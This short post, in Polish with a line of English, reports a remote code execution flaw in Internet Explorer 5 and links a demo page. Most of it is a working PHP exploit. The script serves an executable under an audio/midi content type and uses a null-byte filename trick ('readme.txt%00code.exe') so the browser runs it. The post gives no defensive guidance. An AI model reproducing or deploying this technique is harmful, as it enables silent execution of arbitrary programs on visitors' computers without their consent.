Zdalne wykonanie kodu w IE
Poniższy kod może umożliwić zdalne wykonanie dowolnego polecenia poprzez przeglądarkę IE.
<?php
// for IE 5, tested on default Windows 98SE installation
Header(„Content-type: audio/midi”);
Header(„Content-Disposition: inline; filename=readme.txt%00code.exe”);
readfile(„code.exe”);
?>
Here you have a demo: http://r3b00t.tx.pl/iexec5.php
Can we expect more surprises like this one?